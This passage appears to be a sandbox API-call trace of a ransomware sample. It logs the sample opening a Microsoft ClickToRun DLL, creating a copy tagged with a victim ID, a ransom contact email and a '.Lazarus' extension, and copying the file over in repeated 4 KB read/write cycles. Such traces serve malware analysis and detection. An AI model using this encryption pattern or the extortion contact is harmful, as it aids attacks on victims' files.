hHeap=0x20000) returned 1 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0092.689] AreFileApisANSI () returned 1 [0092.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x854e0 [0092.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0092.689] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x7d0d8)) returned 1 [0092.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0092.689] AreFileApisANSI () returned 1 [0092.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0092.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0092.690] GetLastError () returned 0x0 [0092.690] SetLastError (dwErrCode=0x0) [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0092.690] GetLastError () returned 0x0 [0092.690] SetLastError (dwErrCode=0x0) [0092.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8ace8 [0092.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0092.690] AreFileApisANSI () returned 1 [0092.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 138 [0092.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x114) returned 0x92260 [0092.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x92260, cchWideChar=138 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 138 [0092.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.695] GetFileType (hFile=0x33c) returned 0x1 [0092.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92260 | out: hHeap=0x20000) returned 1 [0092.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0092.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0092.695] AreFileApisANSI () returned 1 [0092.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0092.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85440 [0092.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0092.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0092.695] GetFileType (hFile=0x418) returned 0x1 [0092.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0092.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0092.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0092.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0092.696] GetLastError () returned 0x0 [0092.696] SetLastError (dwErrCode=0x0) [0092.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0092.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0092.696] GetLastError () returned 0x0 [0092.696] SetLastError (dwErrCode=0x0) [0092.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0092.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0092.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0092.696] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0092.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0092.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0092.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0092.698] GetLastError () returned 0x0 [0092.698] SetLastError (dwErrCode=0x0) [0092.698] GetLastError () returned 0x0 [0092.698] SetLastError (dwErrCode=0x0) [0092.699] GetLastError () returned 0x0 [0092.699] SetLastError (dwErrCode=0x0) [0092.699] GetLastError () returned 0x0 [0092.699] SetLastError (dwErrCode=0x0) [0092.699] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.700] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.701] GetLastError () returned 0x0 [0092.701] SetLastError (dwErrCode=0x0) [0092.701] GetLastError () returned 0x0 [0092.701] SetLastError (dwErrCode=0x0) [0092.701] GetLastError () returned 0x0 [0092.701] SetLastError (dwErrCode=0x0) [0092.701] GetLastError () returned 0x0 [0092.701] SetLastError (dwErrCode=0x0) [0092.702] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.702] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.702] GetLastError () returned 0x0 [0092.702] SetLastError (dwErrCode=0x0) [0092.702] GetLastError () returned 0x0 [0092.702] SetLastError (dwErrCode=0x0) [0092.702] GetLastError () returned 0x0 [0092.702] SetLastError (dwErrCode=0x0) [0092.702] GetLastError () returned 0x0 [0092.702] SetLastError (dwErrCode=0x0) [0092.702] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.703] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.703] GetLastError () returned 0x0 [0092.703] SetLastError (dwErrCode=0x0) [0092.703] GetLastError () returned 0x0 [0092.703] SetLastError (dwErrCode=0x0) [0092.703] GetLastError () returned 0x0 [0092.703] SetLastError (dwErrCode=0x0) [0092.703] GetLastError () returned 0x0 [0092.703] SetLastError (dwErrCode=0x0) [0092.703] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.704] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.704] GetLastError () returned 0x0 [0092.704] SetLastError (dwErrCode=0x0) [0092.704] GetLastError () returned 0x0 [0092.704] SetLastError (dwErrCode=0x0) [0092.704] GetLastError () returned 0x0 [0092.704] SetLastError (dwErrCode=0x0) [0092.704] GetLastError () returned 0x0 [0092.704] SetLastError (dwErrCode=0x0) [0092.704] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.704] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.705] GetLastError () returned 0x0 [0092.705] SetLastError (dwErrCode=0x0) [0092.705] GetLastError () returned 0x0 [0092.705] SetLastError (dwErrCode=0x0) [0092.705] GetLastError () returned 0x0 [0092.705] SetLastError (dwErrCode=0x0) [0092.705] GetLastError () returned 0x0 [0092.705] SetLastError (dwErrCode=0x0) [0092.705] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.705] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.705] GetLastError () returned 0x0 [0092.705] SetLastError (dwErrCode=0x0) [0092.706] GetLastError () returned 0x0 [0092.706] SetLastError (dwErrCode=0x0) [0092.706] GetLastError () returned 0x0 [0092.706] SetLastError (dwErrCode=0x0) [0092.706] GetLastError () returned 0x0 [0092.706] SetLastError (dwErrCode=0x0) [0092.706] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.706] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.706] GetLastError () returned 0x0 [0092.706] SetLastError (dwErrCode=0x0) [0092.706] GetLastError () returned 0x0 [0092.706] SetLastError (dwErrCode=0x0) [0092.707] GetLastError () returned 0x0 [0092.707] SetLastError (dwErrCode=0x0) [0092.707] GetLastError () returned 0x0 [0092.707] SetLastError (dwErrCode=0x0) [0092.707] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.707] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.707] GetLastError () returned 0x0 [0092.707] SetLastError (dwErrCode=0x0) [0092.707] GetLastError () returned 0x0 [0092.707] SetLastError (dwErrCode=0x0) [0092.707] GetLastError () returned 0x0 [0092.707] SetLastError (dwErrCode=0x0) [0092.707] GetLastError () returned 0x0 [0092.708] SetLastError (dwErrCode=0x0) [0092.708] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.708] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.708] GetLastError () returned 0x0 [0092.708] SetLastError (dwErrCode=0x0) [0092.708] GetLastError () returned 0x0 [0092.708] SetLastError (dwErrCode=0x0) [0092.708] GetLastError () returned 0x0 [0092.708] SetLastError (dwErrCode=0x0) [0092.708] GetLastError () returned 0x0 [0092.708] SetLastError (dwErrCode=0x0) [0092.709] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.709] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.709] GetLastError () returned 0x0 [0092.709] SetLastError (dwErrCode=0x0) [0092.709] GetLastError () returned 0x0 [0092.709] SetLastError (dwErrCode=0x0) [0092.709] GetLastError () returned 0x0 [0092.709] SetLastError (dwErrCode=0x0) [0092.709] GetLastError () returned 0x0 [0092.709] SetLastError (dwErrCode=0x0) [0092.709] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.710] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.710] GetLastError () returned 0x0 [0092.710] SetLastError (dwErrCode=0x0) [0092.710] GetLastError () returned 0x0 [0092.710] SetLastError (dwErrCode=0x0) [0092.710] GetLastError () returned 0x0 [0092.710] SetLastError (dwErrCode=0x0) [0092.710] GetLastError () returned 0x0 [0092.710] SetLastError (dwErrCode=0x0) [0092.710] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.710] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.711] GetLastError () returned 0x0 [0092.711] SetLastError (dwErrCode=0x0) [0092.711] GetLastError () returned 0x0 [0092.711] SetLastError (dwErrCode=0x0) [0092.711] GetLastError () returned 0x0 [0092.711] SetLastError (dwErrCode=0x0) [0092.711] GetLastError () returned 0x0 [0092.711] SetLastError (dwErrCode=0x0) [0092.711] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.711] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.711] GetLastError () returned 0x0 [0092.711] SetLastError (dwErrCode=0x0) [0092.712] GetLastError () returned 0x0 [0092.712] SetLastError (dwErrCode=0x0) [0092.712] GetLastError () returned 0x0 [0092.712] SetLastError (dwErrCode=0x0) [0092.712] GetLastError () returned 0x0 [0092.712] SetLastError (dwErrCode=0x0) [0092.712] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.852] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.858] GetLastError () returned 0x0 [0092.858] SetLastError (dwErrCode=0x0) [0092.858] GetLastError () returned 0x0 [0092.860] SetLastError (dwErrCode=0x0) [0092.861] GetLastError () returned 0x0 [0092.861] SetLastError (dwErrCode=0x0) [0092.863] GetLastError () returned 0x0 [0092.863] SetLastError (dwErrCode=0x0) [0092.863] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.868] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.869] GetLastError () returned 0x0 [0092.869] SetLastError (dwErrCode=0x0) [0092.869] GetLastError () returned 0x0 [0092.869] SetLastError (dwErrCode=0x0) [0092.871] GetLastError () returned 0x0 [0092.871] SetLastError (dwErrCode=0x0) [0092.871] GetLastError () returned 0x0 [0092.873] SetLastError (dwErrCode=0x0) [0092.873] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.877] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.900] GetLastError () returned 0x0 [0092.900] SetLastError (dwErrCode=0x0) [0092.900] GetLastError () returned 0x0 [0092.900] SetLastError (dwErrCode=0x0) [0092.900] GetLastError () returned 0x0 [0092.900] SetLastError (dwErrCode=0x0) [0092.900] GetLastError () returned 0x0 [0092.900] SetLastError (dwErrCode=0x0) [0092.900] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0092.901] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.901] GetLastError () returned 0x0 [0092.901] SetLastError (dwErrCode=0x0) [0092.901] GetLastError () returned 0x0 [0092.901] SetLastError (dwErrCode=0x0) [0092.901] GetLastError () returned 0x0 